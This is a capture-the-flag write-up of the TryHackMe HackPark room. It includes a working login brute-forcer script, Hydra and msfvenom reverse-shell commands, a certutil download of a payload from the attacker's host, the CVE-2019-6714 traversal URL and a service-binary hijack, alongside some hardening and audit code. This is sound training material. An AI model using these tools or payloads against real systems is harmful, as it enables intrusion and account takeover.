Full Compromise of HackPark

The HackPark room on TryHackMe is a well-structured Windows-based lab that walks through multiple real-world attack techniques: from enumeration, authentication bypass, web exploitation, reverse shell access, to privilege escalation. In this post, I’ll walk through my complete process from scanning to full SYSTEM access.


Initial Enumeration with Nmap

I began with a full TCP port scan to gather a surface-level understanding of the target:

nmap -sC -sV -Pn -p- <target-ip>

Relevant results:

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open  ssl/ms-wbt-server?
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 02:8F:B6:D7:CB:2B (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 immediately stood out as it served a web interface. I accessed it in the browser and found a login panel to BlogEngine.NET.


Web Application Discovery and Login Bruteforce

At this point, I had no access to internal details of the web application, including its version. I focused on brute-forcing the login.

By inspecting the login form at /Account/login.aspx?ReturnURL=/admin, I found the following:

  • Method: POST
  • Username field: ctl00$MainContent$LoginUser$UserName
  • Password field: ctl00$MainContent$LoginUser$Password
  • Submit field: ctl00$MainContent$LoginUser$LoginButton
  • Response text on failure: Login Failed

Additionally, I captured two crucial ASP.NET form tokens: __VIEWSTATE and __EVENTVALIDATION, which are required for each POST.

I generated a login wordlist and ran Hydra against the form. The field names contain dollar signs, so the form specification has to be single-quoted (or the $ written as %24): inside double quotes the shell expands $MainContent and the other fragments to empty strings and Hydra posts mangled field names. The __VIEWSTATE and __EVENTVALIDATION values copied from the intercepted request are already URL-encoded and must stay that way.

hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt <target-ip> http-post-form \
'/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=<...>&__EVENTVALIDATION=<...>&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Log+in:F=Login Failed'

After a few attempts (some VIEWSTATE tokens expired), I finally retrieved valid credentials.
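Hydra works here, but every attempt reuses the one __VIEWSTATE/__EVENTVALIDATION pair pasted into the command, which is exactly why attempts die when those values go stale. As an added example (not part of the original walkthrough and not Hydra's code), the Python below fetches the login page before each attempt, extracts fresh tokens, posts the form with the field names URL-encoded, and treats any response without the "Login Failed" text as success. The sample HTML, the wordlist and the credentials in the offline demo are constructed for illustration; the login path, field names and failure string are the ones described above.

```python
"""Added example (not from the original post): a minimal brute-forcer for the
BlogEngine.NET login form that re-reads __VIEWSTATE and __EVENTVALIDATION
before every attempt instead of pinning one copied value.  Standard library only."""
import re
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from typing import Callable, Iterable, Optional, Tuple

LOGIN_PATH = "/Account/login.aspx?ReturnURL=/admin"
FAIL_MARKER = "Login Failed"          # failure text shown by the login page
USER_FIELD = "ctl00$MainContent$LoginUser$UserName"
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"
BUTTON_FIELD = "ctl00$MainContent$LoginUser$LoginButton"

# ASP.NET emits: <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="..." />
HIDDEN_RE = re.compile(
    r'name="(__VIEWSTATE|__VIEWSTATEGENERATOR|__EVENTVALIDATION)"[^>]*?value="([^"]*)"')


def extract_tokens(html: str) -> dict:
    """Pull the hidden ASP.NET fields out of a rendered login page."""
    tokens = dict(HIDDEN_RE.findall(html))
    missing = {"__VIEWSTATE", "__EVENTVALIDATION"} - set(tokens)
    if missing:
        raise ValueError(f"login page lacks hidden fields: {sorted(missing)}")
    return tokens


def build_body(tokens: dict, user: str, password: str) -> str:
    """URL-encode the form; urlencode turns the '$' in field names into %24."""
    fields = dict(tokens)
    fields[USER_FIELD] = user
    fields[PASS_FIELD] = password
    fields[BUTTON_FIELD] = "Log in"
    return urllib.parse.urlencode(fields)


def brute_force(fetch_login: Callable[[], str], post_login: Callable[[str], str],
                users: Iterable[str], passwords: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Try every pair with freshly fetched tokens.  fetch_login() returns the login
    page HTML; post_login(body) posts the encoded form and returns the reply HTML."""
    passwords = list(passwords)
    for user in users:
        for password in passwords:
            tokens = extract_tokens(fetch_login())      # new tokens per attempt
            html = post_login(build_body(tokens, user, password))
            if FAIL_MARKER not in html:
                return user, password
    return None


def http_client(base_url: str) -> Tuple[Callable[[], str], Callable[[str], str]]:
    """Real transport: one cookie jar so the session cookie survives the POST."""
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))

    def fetch_login() -> str:
        with opener.open(base_url + LOGIN_PATH, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")

    def post_login(body: str) -> str:
        req = urllib.request.Request(base_url + LOGIN_PATH, data=body.encode("ascii"),
                                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        with opener.open(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")

    return fetch_login, post_login


# Constructed sample of the hidden fields, not captured from a real target.
SAMPLE_LOGIN_HTML = """<form method="post" action="login.aspx?ReturnURL=/admin">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJc2FtcGxl" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAQ=" />
</form>"""


def demo() -> Optional[Tuple[str, str]]:
    """Offline run against a fake server; the credentials here are made up."""
    valid = ("admin", "Password1")

    def post_login(body: str) -> str:
        form = urllib.parse.parse_qs(body)          # decodes %24 back to '$'
        if form.get("__VIEWSTATE", [""])[0] != "/wEPDwUJc2FtcGxl":
            return "<p>Login Failed</p>"            # stale token: always fails
        sent = (form[USER_FIELD][0], form[PASS_FIELD][0])
        return "<h1>Dashboard</h1>" if sent == valid else "<p>Login Failed</p>"

    return brute_force(lambda: SAMPLE_LOGIN_HTML, post_login,
                       ["admin"], ["123456", "Password1", "letmein"])


if __name__ == "__main__":
    print("offline demo:", demo())
    # Against a target:  fetch, post = http_client("http://<target-ip>")
    #                    print(brute_force(fetch, post, users, passwords))
```

Success is inferred only from the absence of the failure string, so confirm any hit by hand. Each attempt costs two requests, which makes this slower than Hydra, but it survives token rotation.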


Identifying BlogEngine.NET Version and CVE

Upon successful login, I could now access the admin dashboard. Only then did I confirm the CMS version: BlogEngine.NET 3.3.6.0, as seen in the footer and some HTTP headers.

A quick search showed this version is affected by CVE-2019-6714, a directory traversal in the theme parameter: an authenticated user can point the theme handler at a directory of their choosing inside the application, and the handler then loads and executes the PostView.ascx control it finds there. Combined with the editor's legitimate file upload, that is remote code execution.


Exploiting CVE-2019-6714 for Initial Shell Access

I prepared a basic webshell as a user control named PostView.ascx and uploaded it through the post editor's file upload feature. BlogEngine stores uploads in App_Data/files/, which IIS never serves directly, so the file cannot be requested as a page. The theme handler, however, builds the path to the current theme's PostView.ascx from the theme parameter without sanitising it, so a traversal string makes it load the control from the upload directory instead:

http://<target-ip>/?theme=../../App_Data/files

The name matters: PostView.ascx is the file the handler looks for in whatever directory the parameter resolves to, so a payload uploaded under another name is never loaded. Visiting that URL rendered the page with my control and executed the payload.

Beforehand, I had a Netcat listener ready:

nc -nlvp 6666

Once the shell triggered, I had a basic reverse shell connection.
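To make the traversal concrete, here is an added example of my own (not BlogEngine.NET's source) modelling the theme lookup: the unsanitised join that CVE-2019-6714 describes next to a hardened version that allow-lists the theme name and checks that the resolved path stays under the themes directory. The virtual paths /Custom/Themes and PostView.ascx follow the exploit above; the allow-list rule and the installed-theme check are assumptions for illustration.

```python
"""Added example, not BlogEngine.NET's own code: a model of the theme lookup
behind CVE-2019-6714, the vulnerable join beside a hardened version.  The
virtual paths and the allow-list rule are assumptions for illustration."""
import posixpath
import re
import urllib.parse
from typing import Iterable

THEMES_VROOT = "/Custom/Themes"      # application-relative themes directory
CONTROL = "PostView.ascx"            # the control the theme handler loads
THEME_NAME_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def theme_from_query(query: str) -> str:
    """The parameter arrives URL-encoded; %2e%2e%2f is '../' after decoding."""
    return urllib.parse.parse_qs(query).get("theme", [""])[0]


def theme_control_vulnerable(theme: str) -> str:
    """User input joined straight into the path, the behaviour the CVE describes.
    Windows file APIs accept '\\' as well as '/', so both act as separators."""
    theme = theme.replace("\\", "/")
    return posixpath.normpath(f"{THEMES_VROOT}/{theme}/{CONTROL}")


def theme_control_hardened(theme: str, installed: Iterable[str]) -> str:
    """Allow-list the name, require it to be an installed theme, and verify the
    resolved path is still under the themes root (defence in depth)."""
    if not THEME_NAME_RE.fullmatch(theme):
        raise ValueError(f"theme name rejected: {theme!r}")
    if theme not in set(installed):
        raise ValueError(f"unknown theme: {theme!r}")
    path = posixpath.normpath(f"{THEMES_VROOT}/{theme}/{CONTROL}")
    if not path.startswith(THEMES_VROOT + "/"):
        raise ValueError("resolved outside the themes root")
    return path


def hardened_accepts(theme: str, installed: Iterable[str]) -> bool:
    """Convenience wrapper: True if the hardened lookup would serve the theme."""
    try:
        theme_control_hardened(theme, installed)
        return True
    except ValueError:
        return False


def escapes_themes_root(theme: str) -> bool:
    """True when the vulnerable join would leave /Custom/Themes; a quick check
    to run over 'theme' values pulled from request logs."""
    return not theme_control_vulnerable(theme).startswith(THEMES_VROOT + "/")


if __name__ == "__main__":
    attack = theme_from_query("theme=..%2F..%2FApp_Data%2Ffiles")
    print("vulnerable handler loads:", theme_control_vulnerable(attack))
    print("hardened handler accepts it:", hardened_accepts(attack, ["Standard"]))
```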


Switching to Meterpreter for Better Control

The initial shell was unstable. I generated a more reliable ASPX Meterpreter payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=4444 -f aspx -o revshell.aspx

I uploaded it via the same post editor, then visited the URL again via theme traversal. On my Metasploit listener:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <my-ip>
set LPORT 4444
exploit -j

This time I got a full Meterpreter session.


Creating a Stable Reverse Shell with msfvenom

For the sake of the lab (which discourages Meterpreter for the PrivEsc phase), I created a more stable raw reverse shell binary:

msfvenom -p windows/shell_reverse_tcp LHOST=<my-ip> LPORT=8888 -f exe -o shell.exe

I hosted it via Python:

python3 -m http.server 8000

Then I used certutil inside the Windows shell to pull the file:

certutil -urlcache -split -f http://<my-ip>:8000/shell.exe C:\Windows\Temp\shell.exe

With a Netcat listener running on 8888:

nc -nlvp 8888

Once executed, this gave me a much more stable shell to proceed with enumeration.


System Enumeration with winPEAS

To prepare for privilege escalation, I downloaded and transferred winPEASx64.exe to the same writable temp folder. Then I ran:

C:\Windows\Temp\winPEASx64.exe

From the output, I gathered valuable data:

  • OS: Windows Server 2012 R2 Build 9600
  • Original install date: 8/3/2019, 10:43:23 AM
  • Unquoted service paths
  • A service called WindowsScheduler running with high privileges
  • Executable: Message.exe in a writable path

Privilege Escalation via Service Hijacking

I replaced the vulnerable Message.exe binary with my own reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=<my-ip> LPORT=9999 -f exe -o privesc.exe

I uploaded the file and overwrote the original (copying the original Message.exe aside first is worth doing so the service can be restored once the shell is in hand). Then I restarted the service:

sc stop WindowsScheduler
sc start WindowsScheduler

Shortly after, I received a new reverse shell as NT AUTHORITY\SYSTEM.
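winPEAS did the enumeration here; as an added example (not winPEAS code and not part of the original post), the Python below performs the two service checks that matter for this escalation path: service binaries the current user can overwrite, which is the Message.exe case, and unquoted image paths containing spaces, where Windows would try C:\Program.exe before the real binary. The service inventory and writable paths in the demo are constructed; on a Windows host the script pulls the real inventory through PowerShell's Get-CimInstance Win32_Service.

```python
"""Added example, not part of the original post or of winPEAS: audit Windows
service image paths for binaries the current user can overwrite and for
unquoted paths.  The demo inventory is constructed."""
import csv
import io
import ntpath
import os
import re
import subprocess
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple


@dataclass
class Service:
    name: str
    image_path: str     # BINARY_PATH_NAME from `sc qc` / Win32_Service.PathName
    account: str        # SERVICE_START_NAME, e.g. LocalSystem


@dataclass
class Finding:
    service: str
    kind: str           # "writable-binary" or "unquoted-path"
    path: str           # file to replace, or file to create
    account: str


def split_image_path(image_path: str) -> Tuple[str, bool]:
    """Return (binary, was_quoted); arguments after the executable are dropped."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:len(s) if end == -1 else end], True
    m = re.match(r"(.+?\.exe)(?:\s|$)", s, re.IGNORECASE)
    return (m.group(1) if m else s), False


def hijack_candidates(binary: str) -> List[str]:
    """For an unquoted path with spaces, the executables Windows tries before the
    real one: C:\\Program.exe, then C:\\Program Files\\Some.exe, and so on."""
    parts = binary.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def default_is_writable(path: str) -> bool:
    """On Windows os.access only reflects the read-only attribute, not the ACL,
    so treat a hit as a lead and confirm it with `icacls <path>`."""
    return os.path.exists(path) and os.access(path, os.W_OK)


def audit(services: Iterable[Service],
          is_writable: Callable[[str], bool] = default_is_writable) -> List[Finding]:
    findings: List[Finding] = []
    for svc in services:
        binary, quoted = split_image_path(svc.image_path)
        if is_writable(binary):
            findings.append(Finding(svc.name, "writable-binary", binary, svc.account))
        if not quoted and " " in binary:
            for cand in hijack_candidates(binary):
                if is_writable(ntpath.dirname(cand)):   # can we create cand?
                    findings.append(Finding(svc.name, "unquoted-path", cand, svc.account))
    return findings


def services_from_csv(text: str) -> List[Service]:
    """Parse Name,PathName,StartName CSV as produced by ConvertTo-Csv."""
    rows = csv.DictReader(io.StringIO(text))
    return [Service(r["Name"], r["PathName"] or "", r["StartName"] or "") for r in rows]


def collect_services_windows() -> List[Service]:
    cmd = ("Get-CimInstance Win32_Service | Select-Object Name,PathName,StartName "
           "| ConvertTo-Csv -NoTypeInformation")
    out = subprocess.run(["powershell", "-NoProfile", "-Command", cmd],
                         capture_output=True, text=True, check=True).stdout
    return services_from_csv(out)


# Constructed inventory and writable set for the offline demo.
SAMPLE_SERVICES = [
    Service("WindowsScheduler", r'"C:\Program Files (x86)\SystemScheduler\Message.exe"', "LocalSystem"),
    Service("ExampleSvc", r"C:\Example Apps\Vendor Tool\svc.exe -k netsvcs", "LocalSystem"),
    Service("Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
]
SAMPLE_WRITABLE = {r"C:\Program Files (x86)\SystemScheduler\Message.exe", r"C:\Example Apps"}


def demo() -> List[Finding]:
    return audit(SAMPLE_SERVICES, is_writable=lambda p: p in SAMPLE_WRITABLE)


if __name__ == "__main__":
    on_windows = os.name == "nt"
    source = collect_services_windows() if on_windows else SAMPLE_SERVICES
    writable = default_is_writable if on_windows else (lambda p: p in SAMPLE_WRITABLE)
    for f in audit(source, writable):
        print(f"{f.kind:16} {f.service:20} {f.account:14} {f.path}")
```

A writable-binary hit running as LocalSystem is the Message.exe situation above; an unquoted-path hit means dropping an executable at the reported path and restarting the service (or rebooting) gets it run in the service's context. Confirm either with icacls before overwriting anything, since os.access does not read ACLs on Windows.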


Post-Exploitation: Flag Capture

With SYSTEM access, I moved to the user directories and collected both flags:

  • C:\Users\Jeff\Desktop\user.txt
  • C:\Users\Administrator\Desktop\root.txt

Both were successfully captured.


Final Thoughts

HackPark is an excellent lab that forces you to chain multiple steps:

  • Port and service enumeration
  • ASP.NET form analysis and Hydra brute-force
  • Exploiting BlogEngine.NET’s CVE-2019-6714
  • Shell pivoting and improving access stability
  • Privilege escalation via writable service binaries

Highly recommended for anyone prepping for OSCP or real-world Windows penetration testing scenarios.